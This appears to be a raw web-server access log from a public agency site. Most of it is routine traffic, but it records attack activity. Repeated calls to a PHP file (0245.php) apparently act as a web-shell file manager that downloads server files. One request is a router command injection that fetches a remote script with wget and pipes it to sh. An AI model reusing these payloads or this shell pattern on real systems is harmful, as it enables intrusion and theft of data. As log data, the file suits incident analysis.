47.128.47.196 - - [16/Jun/2024:19:55:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5C&f=metalmecanica.swf&ft=download&white=1 HTTP/1.1" 200 396958
201.245.192.253 - - [16/Jun/2024:19:55:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.42.108 - - [16/Jun/2024:19:55:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5319.pdf&ft=img&white=1 HTTP/1.1" 200 1400591
201.245.192.253 - - [16/Jun/2024:19:56:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.47.216 - - [16/Jun/2024:19:56:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Ctcpdf&f=tcpdf.php&ft=download HTTP/1.1" 200 708262
66.249.66.37 - - [16/Jun/2024:19:56:38 -0500] "GET /guadalupe-aguanoso-y-otros-tres-caminos-de-los-cerros-estarin-cerrados-este-fin-de-semana.html HTTP/1.1" 200 797
172.22.2.4 - - [16/Jun/2024:19:55:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.125.44 - - [16/Jun/2024:19:57:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1751-1800%5C&f=00001791.tif&ft=notepad&white=1 HTTP/1.1" 200 315077
201.245.192.253 - - [16/Jun/2024:19:57:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:19:56:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
47.128.56.79 - - [16/Jun/2024:19:57:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=deprecated.php&ft=download HTTP/1.1" 200 99470
201.245.192.253 - - [16/Jun/2024:19:58:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:19:58:26 -0500] "HEAD / HTTP/1.1" 200 -
47.128.19.211 - - [16/Jun/2024:19:58:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4140.pdf&ft=download HTTP/1.1" 200 384679
66.249.66.20 - - [16/Jun/2024:19:59:04 -0500] "GET /Publicaciones/2024EE73985.pdf HTTP/1.1" 404 227
47.128.122.249 - - [16/Jun/2024:19:59:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0480.pdf&ft=download&white=1 HTTP/1.1" 200 20135
201.245.192.253 - - [16/Jun/2024:19:59:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
207.46.13.153 - - [16/Jun/2024:19:59:27 -0500] "GET /Publicaciones/2024EE105994.pdf HTTP/1.1" 404 228
201.245.192.253 - - [16/Jun/2024:19:59:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.60.118 - - [16/Jun/2024:19:59:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1251.pdf&ft=download&white=1 HTTP/1.1" 200 97959
201.245.192.253 - - [16/Jun/2024:20:00:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.40.111 - - [16/Jun/2024:20:00:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20141116-1744-352000.txt&ft=download&white=1 HTTP/1.1" 200 2987
47.128.37.225 - - [16/Jun/2024:20:01:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4497.pdf&ft=download HTTP/1.1" 200 442023
201.245.192.253 - - [16/Jun/2024:20:01:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.56.70 - - [16/Jun/2024:20:01:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5192.pdf&ft=download HTTP/1.1" 200 343719
201.245.192.253 - - [16/Jun/2024:20:02:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:20:01:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.36.235 - - [16/Jun/2024:20:02:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2001-2050&f=00002035.tif&ft=download HTTP/1.1" 200 198390
185.191.127.212 - - [16/Jun/2024:20:02:53 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:20:03:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.36.249 - - [16/Jun/2024:20:03:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1551-1600&f=00001564.tif&ft=download HTTP/1.1" 200 130350
216.245.221.92 - - [16/Jun/2024:20:04:02 -0500] "HEAD / HTTP/1.1" 200 -
47.128.35.192 - - [16/Jun/2024:20:04:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2001-2050&f=00002014.tif&ft=download HTTP/1.1" 200 310947
201.245.192.253 - - [16/Jun/2024:20:04:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:20:04:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.32.79 - - [16/Jun/2024:20:04:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2451-2500&f=00002491.tif&ft=download HTTP/1.1" 200 175690
186.102.3.156 - - [16/Jun/2024:20:04:49 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/6iaqQ9rTAS7ImZ91OCUcIp3LFvD0fl3r7ErFHIHIr0qg//+ho24pk&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 30
186.102.3.156 - - [16/Jun/2024:20:04:49 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18PX7BLBAkQjG8oeGyfRPr9jZtA3pYlAjGAqoJmMa+Bp5rcXHOrQNI/6dtN8Wa6yqCJBdN79+PwKpyoldyqIUHUq810OrmcqTo=&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 97
186.102.3.156 - - [16/Jun/2024:20:04:49 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18i2PzlTlNEVbwOs9fZNTZQetd8/u/2ghfGIQGDfHHZe/wnrZjJSJCuCBFqN8bZAzz7YmqFFtoc2qPT9A6crz5gKFsVibUejrU/LJWcbbdeL12hObeMuSpbOzKEE34hhYJzSyM1KSOOPViWO04OlgfDEhiMQ+9XtW2pthdKkgfo2eIyrCe6UIF+YPWxZfTOXg8KPQr9ZwPCZAFVOFAjhfaoXKeniUqS07K3HDKigHrtJzTfhzUEYbcRL7XGtEEZvPbxImcW6PEuZEqrNXyYoem6AezQ9JkMLSu2LxWBvYyBRHLlaHAkfDgUPnmcRpA0Vyh0kMZZC9IZdFd81BZUZpJnlevzXN4SVeZey+9H5Ahj4MkyE4wXF2YNZBvuq0q2FGe3fLcBgJrcgwXOKeGRb1sfn4ujbaz2eHayBa1Vjq9q3kvAzhc/waxlsGNVcMigUX7XL6ME4fhjypuMjxCf7opXHgtPiLSmVmV2b76ki8riSBhdhmLO9QRG/4wcKSBRprAFqcUPRz5XzbjtSh3ZmPD6v5pH8Uu9SCglAhIMiPJL56w9z0g99fAtvjmo4GJEIX4sdROaImC+QX6AHQjGZXcuhAvFcVvGM19rt71VBFYeXg4B5N8RG2ECP6q7vjcHCImm7UbkURuAJbcAOrrdlfKH2R2HlB3YwnDI8sIg17D/AjIlakaFntHKTFkFWF8+Kjff5LgMUnDXdRfr6NvPzC/8oXR4ICLHryML+6NdwSgwlSihkUHsRM6zUDVaCFntuCarKGD0dKoGOFEPX3QpOHK3pbnNmuHKW1AwsjnhYP+eRxX3elv/RPQ7YkbiIjb6ZJCizvwacYLsiR8sYD+AxU0sIUGuYG5CZSFbutfyFZvZe0beuauuOGLhn3XcUzFuoVjTdrd3YY8H+JXfFrB4r112q5wkPH+leXy/fKvKNV5eKUuToxWMA8ObQAkjgXPwaiXJmV+mT1QyhLLqIspqBmUMSyX5b9UWk7L/RTV/1IVSNiDlvzFzx3tDEz4aQGJq6vYX1vk4T1R055dDVgiftz1Bu5XaXjZuRhOF8aTKwDHfI/cjlVIub7+bbq6nLqfWBsEX19cwNly7H1g5dTIa+4niY1xYMBX3mhPtuXbhDrN94J4rqlKMm4yvpi80SuDYSKdwj9zB1QJ3eNmjHUXbds717+YfSYa7wq1+ZoI+K+HTlbXKIP6eSv2vMEzcMdPaaHy0T7j2IXyfyKzrtMpzY5NlS+1xC0IVmiiei9+UG5hJnSr0K5xKwQzZmKS2apryg88QTG65V+ZWss43K9k0gSbByehUl6L1Xgw/zDHLac4d5OCiYOcBu1lwlJ88X4HGlyczkitzjgO2JJRGBeVSglW4i7NHPDdkS8cY4XibIuPXwQKqmZkxgnAfdkN4bMZJa5TkX3IUtgUR6bXFvHML3M8r/qwZcP1JNIlZxxtQS49Dsv4vQ+d6w7Cmf8jR1aXJIavaI5b3yi7DGIZXVnScor7zAWs7jf0ZicdU0s1ts5xg3g1i0od0COFw2r9ydotPuJs4/cS7zDpZi/Hu0StocvkhwKVGvwlbBzbmQ2Icn4Jij0+8xztqCy2yABxfHe6Tv3JLSscN3eXUooFoLE0S0v+EC+9/m9TigH63dScboGi5usI6dJwdsAvGH0WM16fmEm603nhluJW2RqoJxOkv9Nz8yJSANtw8JFmtnv9CvmiOTnfQv5hu6vN5aNMWWfwGc6MEk/I81fdcIJ3fAjDeg50W7wjsZgQ27cgGDzzkZOdf1KdYK8+VJhmd&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 1367
186.102.3.156 - - [16/Jun/2024:20:04:49 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+lOekc0wieCmnt+AWtePpyIQZKb1NbqAM4xFEaUZHTu+7XNcGluaKf+zpwjt6hgb9ykCVYTXfSlDnsbg3R8FTrAIyrjmrdAL9gn4xvYmnR7dwzTLRvkz+swXwMsieD60CJgymp3v5JkJqafwI3LM+a9Gslhj7mUK5WOIORcuI/HSMpjCF2cRKkuzbMfxlkNfAVt08+m8e+X3MmIrVXkTIpNOpq33jEHlDpCRTKst1NEGnrHab6TzmB6ZSONipQ6i9KttYBVxcW0GHC23pmlyvhKqwniNtcTd4RmZAYBEqbxe9YXmx7d70BGn06D9g42QmuJDC1q+xYssfW8dNLKY491YZWKQmM2Sh+lyLe06eFRxyXrcNCYL5xQKvyAVS/KgT2BViNtoFDqXeHSSVoZAvilcaRfy/A0uFHI1tk3wzRxSt30vXwcJsx6iKSn9mqZLqHsN3jVaYMp1o0s8XidHvhtLMYuJ6gnzb5skgMTwsk8hx62/yKu5TpjnwCs43yMCAJ/Mo+uHn23gtwp1ojlkTmg2MLnzlP+RD/2R95wUc1/XLQTZlM1AdPWXNKfr9pTl6QIa3BHPipJtfqdteI70DR0CfpghAUydWahB73a1YrHLfK+jSLWtaSlT2UkWRaFihLk3b+/nKoXUMWTklsuOIdQ/oV8SRu+Z+R6CaXFOmoq6r8THf2QxoUpmdsWrC3ge7r5wqdTKT7ESurq8SiXWj1++zV3zC/ufDS8RvmEidK0oBX0vlzWZvD&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 222
186.102.3.156 - - [16/Jun/2024:20:04:49 -0500] "GET /kwssiamovil/sm/cjson/pre?f=19&x=U2FsdGVkX1/6iaqQ9rTAS7ImZ91OCUcIp3LFvD0fl3r7ErFHIHIr0qg//+ho24pk HTTP/1.1" 200 66301
186.102.3.156 - - [16/Jun/2024:20:05:06 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19NKO/YhGvgc281H0I9ETFHLAnCKn3KU8uy/y92tf11VILYc2kd9QJdK1k8vyAAoP242qesckYUDL/68sTyj88nSOdBd2hhr4E3cxNRZcdQm8oHWDgB2gIr&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 105
186.102.3.156 - - [16/Jun/2024:20:05:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18cg6USf8yWy46LLwifIvJj7NSKW7BMxVhQ6fhSPWfTXeUi/o7OGh069peWtXA5EC1nRNjwfnKxRuwlU/lbDJU3NHFT91sthHLI4MtFfzD9NbVYV9sdBFNKbal83KIawXZquIH3r5RSqGZ8fkMaLddzWLiYuW3NolUg/7839orzc5BIsXXHka70tvrNfBsOIs8EJMmwTfw754/lnshhxjvQLXwb/LPw/GmpzwX4DrRKmNu74xJ0We8i6/AtVSRQJfPxg7vr2InAbA==&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 74
186.102.3.156 - - [16/Jun/2024:20:05:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/5VyH4cQDxAJ2YFZtHHSZc2Ru4fr2N1D5bPM0lzTotm5jWdaD4+WLqFqOGlxH1Vj4SXk+vd1oyDdtLHFWQcj8V4WcgE2dDVhSdwMbVrOthdyYx8R92vSamOOaYwPEAIOnsvjhg8g+xeYsJ1IbbUTltAmu4ZP7PYoYPZmqiXbETD7y+JSaIS7ep67e6GYENfxbPexriWrI57Ttcj/or686SuoJkrExUDvXDBk/blBZcFrrx5d//kUeC&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 125
186.102.3.156 - - [16/Jun/2024:20:05:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/LfSYGVQaqZkVGFayMuB6fV1rG17yChLUM9cL8obuDVNXr7Ts7J0OFeEIIJ2TCfYKAu69xuvdCYwsqn0erAGHXPiFcF0sej5XDSPoM0oYJgOpqmjF+Io3f&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 130
186.102.3.156 - - [16/Jun/2024:20:05:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/0TgrTX8gAFNY4Wy3MisPB5dPAhN3sjqXH18CX2Dm1iWHAsS2NvMx4GA2HrowW7xjNuqkO+mlOOzMwM2c3VbuZiNNIDcLgqeYf524n+PH9ENyOlaB8TlBsfAkURXIItAn9LW79vrIyQoj/29zabGHMavQ75EjM8Dear1XL/VkChbC7TfQ6YdDqDl7gdI5AUREI681vpxJ/pYbZxdvNBHrnMsnFCfzqhWv/LSWwdg5Wn9rwCjqurnv3UbSG1mXd3QHF8Wcbcx2yzQ==&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 131
186.102.3.156 - - [16/Jun/2024:20:05:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+b7v8jByw2MxUNUrBN6oM9fTvcSrdvaHT1LdM51K+1k1hUibos3jn+35S3aUq4lPe9etIDXzLmZ4WdXxmFxDfRdVohcvrcP/F0CcfG7cnTLH8tTLZxs5WFSlLK6f8OMrCwKFYBtjh2Qw==&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 96
186.102.3.156 - - [16/Jun/2024:20:05:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18e6UusWljik8YrQBBziGb4fA7QIRK09qtpqon1SfmHJfm362OnOv0y9cn2/yVQpYsM0iuWJmEtuIiglMj3bY9IasB28kjYQ1K3H9wb20FaHd5flDYkydCb&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 96
186.102.3.156 - - [16/Jun/2024:20:05:10 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18L42Kay3TiutR+dcVCMkVDpJyb6yc1LXBFWwZyEuEiVmvP+CP/01MT8DXncQmJySvnUlsu0YM6CpOLF6+X74ylA5JTyjvjGdztCtRMrEuD5gqkyqBlngXO&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 129
186.102.3.156 - - [16/Jun/2024:20:05:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18PcdH3VAljwniBFWNnT5Ce2gFAWo6Xl+/YwOiFkFR/oy0WXF5yw1LN5Ai1iLGgaAEEiabaxg+iclO15e5+ZzSJ9JMz/shJrZS2C3+vb6owTtZv0xHKP9ixYAJksFsbHe+3OGxaHodQ9hbVItTaJ+NKrK5+cZhBWcI=&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 93
186.102.3.156 - - [16/Jun/2024:20:05:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19H7y+Rtcgm44AwG41pX0PAoUIT0tSNgYZmCch9nQieKPdaBqJ0+QJOpTkAPwD30L5pheOC47jm5IDtgNqoYj9E1P1IzASfGrSnxLz8XxQJUq3fNujfAJpRqAjN7TyB/xqG0Ior8D1LT6UHC4CE1kmwzLj6RMgH/UplzyNVUM4aQ+soqYGrFiKPu2fAuGQV/wpg4A2U/x7W9rTlRVKnOPrTJuTuA1/Zf+YEjiunBqR90tPVRR8eVXAUrPLv8ZiR60NvpCKynxUHIw==&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 74
186.102.3.156 - - [16/Jun/2024:20:05:11 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/w4BTzQWig81dHDSOFAD/E+CVfLWoF617n+5Sswq4GH5Zp+aEoX8gcLjSjZwYTSLyyioSknZ06DsVTtXU1VJO3aNRkglK4J9FXOU42H1sMHR0MJCAtQKG1HLiTN4/QdakyxOpJC5AaPA==&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 159
201.245.192.253 - - [16/Jun/2024:20:05:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.113.37 - - [16/Jun/2024:20:05:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2351-2400&f=00002397.tif&ft=download HTTP/1.1" 200 278179
47.128.113.51 - - [16/Jun/2024:20:06:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cimages%5C&f=stars.png&ft=download HTTP/1.1" 200 924
181.63.25.20 - - [16/Jun/2024:20:06:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 157517
181.63.25.20 - - [16/Jun/2024:20:06:16 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:06:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:06:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:06:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:06:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:06:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:06:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.63.25.20 - - [16/Jun/2024:20:06:16 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.63.25.20 - - [16/Jun/2024:20:06:16 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
201.245.192.253 - - [16/Jun/2024:20:06:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.63.25.20 - - [16/Jun/2024:20:06:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 138603
181.63.25.20 - - [16/Jun/2024:20:06:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 259416
47.128.113.248 - - [16/Jun/2024:20:06:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=RecentFavoriteTable.class.php&ft=download&white=1 HTTP/1.1" 200 11052
201.245.192.253 - - [16/Jun/2024:20:07:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.113.242 - - [16/Jun/2024:20:07:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2351-2400&f=00002389.tif&ft=download HTTP/1.1" 200 548515
47.128.25.211 - - [16/Jun/2024:20:08:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1101-1150%5C&f=00001139.tif&white=1 HTTP/1.1" 200 163588
201.245.192.253 - - [16/Jun/2024:20:08:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:20:06:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.47.178 - - [16/Jun/2024:20:08:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2302.pdf&ft=download&white=1 HTTP/1.1" 200 380583
216.245.221.92 - - [16/Jun/2024:20:09:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:20:09:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:20:07:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
47.128.25.23 - - [16/Jun/2024:20:09:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0545.pdf&ft=download&white=1 HTTP/1.1" 200 343719
201.245.192.253 - - [16/Jun/2024:20:09:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.58.154 - - [16/Jun/2024:20:10:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4435.pdf&ft=download&white=1 HTTP/1.1" 200 380583
201.245.192.253 - - [16/Jun/2024:20:10:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.25.250 - - [16/Jun/2024:20:10:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=general-template.php&ft=download&white=1 HTTP/1.1" 200 20123
66.249.66.19 - - [16/Jun/2024:20:11:04 -0500] "GET /Publicaciones/2024EE63026.pdf HTTP/1.1" 404 227
201.245.192.253 - - [16/Jun/2024:20:11:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.31.40 - - [16/Jun/2024:20:11:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CUsers%5CAdministrator%5CDownloads&f=autodeclaracion%2812%29.csv&ft=download HTTP/1.1" 200 20120
47.128.99.124 - - [16/Jun/2024:20:12:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1751-1800&f=00001797.tif&ft=download HTTP/1.1" 200 134564
201.245.192.253 - - [16/Jun/2024:20:12:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.53.88 - - [16/Jun/2024:20:13:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150902-1651-10000.txt&ft=download HTTP/1.1" 200 595
66.249.66.19 - - [16/Jun/2024:20:13:04 -0500] "GET /BLA/resoluciones/AUTOS%202023/1374.pdf HTTP/1.1" 200 437856
